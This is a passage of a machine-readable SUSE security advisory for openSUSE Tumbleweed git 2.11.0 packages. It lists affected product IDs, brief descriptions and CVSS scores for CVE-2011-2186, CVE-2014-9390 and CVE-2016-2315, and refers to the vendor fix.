"openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", }, product_reference: "git-web-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-web-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", }, product_reference: "git-web-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-web-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", }, product_reference: "git-web-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "git-web-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", }, product_reference: "git-web-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "gitk-2.11.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", }, product_reference: "gitk-2.11.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "gitk-2.11.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", }, product_reference: "gitk-2.11.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "gitk-2.11.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", }, product_reference: "gitk-2.11.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "gitk-2.11.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", }, product_reference: "gitk-2.11.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, ], }, vulnerabilities: [ { cve: "CVE-2011-2186", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2011-2186", }, ], notes: [ { category: "general", text: "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, references: [ { category: "external", summary: "CVE-2011-2186", url: "https://www.suse.com/security/cve/CVE-2011-2186", }, { category: "external", summary: "SUSE Bug 698456 for CVE-2011-2186", url: "https://bugzilla.suse.com/698456", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-06-15T00:00:00Z", details: "moderate", }, ], title: "CVE-2011-2186", }, { cve: "CVE-2014-9390", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2014-9390", }, ], notes: [ { category: "general", text: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, references: [ { category: "external", summary: "CVE-2014-9390", url: "https://www.suse.com/security/cve/CVE-2014-9390", }, { category: "external", summary: "SUSE Bug 910756 for CVE-2014-9390", url: "https://bugzilla.suse.com/910756", }, { category: "external", summary: "SUSE Bug 925040 for CVE-2014-9390", url: "https://bugzilla.suse.com/925040", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 9.8, baseSeverity: "CRITICAL", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, products: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-06-15T00:00:00Z", details: "critical", }, ], title: "CVE-2014-9390", }, { cve: "CVE-2016-2315", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2016-2315", }, ], notes: [ { category: "general", text: "revision.c in git before 2.7.4 uses an incorrect integer data type, which allows remote attackers to execute arbitrary code via a (1) long filename or (2) many nested trees, leading to a heap-based buffer overflow.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, references: [ { category: "external", summary: "CVE-2016-2315", url: "https://www.suse.com/security/cve/CVE-2016-2315", }, { category: "external", summary: "SUSE Bug 971328 for CVE-2016-2315", url: "https://bugzilla.suse.com/971328", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 9.8, baseSeverity: "CRITICAL", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, products: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE 